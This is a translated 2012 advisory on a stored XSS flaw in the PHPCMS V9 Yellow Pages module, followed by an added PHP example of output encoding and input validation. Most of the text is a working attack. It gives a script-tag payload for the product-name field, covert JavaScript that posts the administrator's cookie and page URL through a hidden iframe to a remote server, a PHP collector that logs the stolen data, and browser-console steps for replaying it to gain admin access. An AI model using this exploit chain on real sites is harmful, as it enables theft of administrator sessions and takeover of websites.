PHPCMS V9 Yellow Pages module XSS vulnerability: obtaining admin permissions, and a repair plan (vulnerability warning, Black Bar Safety Net)

ID MYHACK58:62201233622
Type myhack58
Reporter 佚名 (anonymous)
Modified 2012-04-10T00:00:00



The PHPCMS back end decides whether you are a system administrator from the Cookie together with the pc_hash value in the query string. The Cookie lives on the user's machine, while pc_hash is stored in the site database. If you obtain both and set them up in your browser environment, then opening the site's back end gives you the corresponding administrator permissions.

The basic modules of PHPCMS V9 do not strictly filter user input, so a user can construct a script and submit it successfully. As long as that script can read the user's Cookie data and the PC_HASH, you can construct a browser environment without having to log into the back-end management system at all.

Vulnerability reproduction

First assume you are a merchant member of the website and already have permission to publish products, business opportunities, or other item types whose list can be seen in the back-end interface.

Add a product type and, in the Product name field, construct the following text: {random name}<script src={jsurl}></script>, where jsurl is the script on your remote site.

Then click Submit. When the administrator views Modules - Business Yellow Pages - Information - Product Information Management, the page already loads your remote script by default.

So how should your remote script obtain the corresponding Cookie and pc_hash?

One might write PHP code like this:

    <?php
    print_r($_SERVER['HTTP_REFERER']);
    print_r($_COOKIE);

But this does not actually work, because the Cookie is cross-domain: the remote script's server cannot read the key Cookie.

Since we are talking about XSS here, we have to use JavaScript.

    (function() {
        var createElement = function(tag, obj) { // create an element and copy the given properties onto it
            var elem = document.createElement(tag);
            for (var k in obj) {
                if (obj.hasOwnProperty(k)) {
                    elem[k] = obj[k];
                }
            }
            return elem;
        };
        document.write('<style type="text/css">.h{display:none}</style>');
        var href = window.location.href,
            cookie = document.cookie,
            iframe = createElement("IFRAME", {
                name : "QPWOEIRU96",
                src : "about:blank",
                className : "h"
            }),
            form = createElement("FORM", {
                target : "QPWOEIRU96",
                action : "",     // remote PHP file
                method : "POST", // submission method
                id : "QPWOEIRU96",
                className : 'h'
            });
        form.appendChild(createElement("textarea", { name : "cookie", value : cookie }));
        form.appendChild(createElement("textarea", { // back-end address
            name : "href", value : href }));
        form.appendChild(createElement("textarea", { // site
            name : "host", value : "http://" + window.location.host }));
        form.appendChild(createElement("textarea", { // time as a Unix timestamp
            name : "time", value : +new Date() }));
        document.body.appendChild(iframe);
        document.body.appendChild(form);
        document.getElementById("QPWOEIRU96").submit();
    })();

Why write it this way? Because this script is covert: whether it runs or not, the administrator sees no visible change, and because it uses a closure it does not damage any global JavaScript objects.

The idea of the script above is to construct a form with the id QPWOEIRU96 and submit it into a hidden iframe named QPWOEIRU96, achieving a cross-domain POST of the data.

Of course you need to create a script on the remote side to receive the data; the following one-line PHP will do:

    <?php
    file_put_contents("temp.txt", json_encode($_POST) . "\r\n", FILE_APPEND);

Then just wait for the site administrator to be caught by it.

How to use the acquired data?

As time passes you will find that temp.txt fills up with a lot of JSON data.

Take the last record directly and run it in the Chrome console:

    window.location = (json data).host;
    // after jumping to that page, run the following
    document.cookie = (json data).cookie;
    window.location = (json data).href;

Then you will find yourself gloriously inside the back-end management page.


The PC_HASH and the Cookie will expire, so use the captured data immediately.

If you do not know the password, you can log in only once: if you log out, you cannot use the last captured data to get in again unless you capture new data the next time.


Disable PHPCMS V9's basic modules and wait for the official fix, or add your own input filtering.
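What "your own filtering" looks like for the product-name field described above, as an added example that is not PHPCMS code: the vulnerable pattern (writing the stored name into the admin list page as-is) beside the hardened pattern (encoding for the HTML context at output time), plus a submission-time check that rejects any name carrying markup. The function names, the product_name field and the table-cell template are assumptions for illustration; the sample inputs are constructed and use the {jsurl} placeholder from the write-up.

```php
<?php
// Added example, not PHPCMS V9's own code. Function names and the <td> template
// are assumptions; the samples below are constructed test inputs.

// Vulnerable pattern: the stored product name is concatenated straight into the
// admin page, so 'Widget<script src={jsurl}></script>' becomes live markup when
// the administrator opens Product Information Management.
function render_product_name_vulnerable(string $productName): string
{
    return "<td>" . $productName . "</td>";
}

// Hardened pattern: encode for the HTML context at the point of output.
// ENT_QUOTES covers both quote styles, so the value is also safe inside attributes;
// ENT_SUBSTITUTE replaces invalid UTF-8 instead of returning an empty string.
function render_product_name_safe(string $productName): string
{
    return "<td>" . htmlspecialchars($productName, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8') . "</td>";
}

// Defence in depth: validate at submission time so a name with tags is never stored.
// If strip_tags changes the string, the input contained markup and is rejected.
function validate_product_name(string $productName): bool
{
    if ($productName === '' || mb_strlen($productName, 'UTF-8') > 100) {
        return false;
    }
    return strip_tags($productName) === $productName;
}

// Constructed samples: a benign name and the payload shape from the write-up.
$samples = [
    'Garden Hose 20m',
    'Widget<script src={jsurl}></script>',
];

foreach ($samples as $name) {
    echo "input:      {$name}\n";
    echo "accepted:   " . (validate_product_name($name) ? 'yes' : 'no') . "\n";
    echo "vulnerable: " . render_product_name_vulnerable($name) . "\n";
    echo "safe:       " . render_product_name_safe($name) . "\n\n";
}
```

Run it with the PHP CLI: the benign name is accepted and rendered unchanged, while the second sample is rejected at validation and, if it had already reached the database, is rendered as the inert text `Widget&lt;script src={jsurl}&gt;&lt;/script&gt;` rather than a script tag. Output encoding is the fix that actually closes the hole, since the same stored value may be echoed in several templates; the validation check only reduces what gets stored. Separately, the exfiltration script above reads document.cookie, and a session cookie set with the HttpOnly flag is not readable from JavaScript, which blunts that particular step even when an injection slips through.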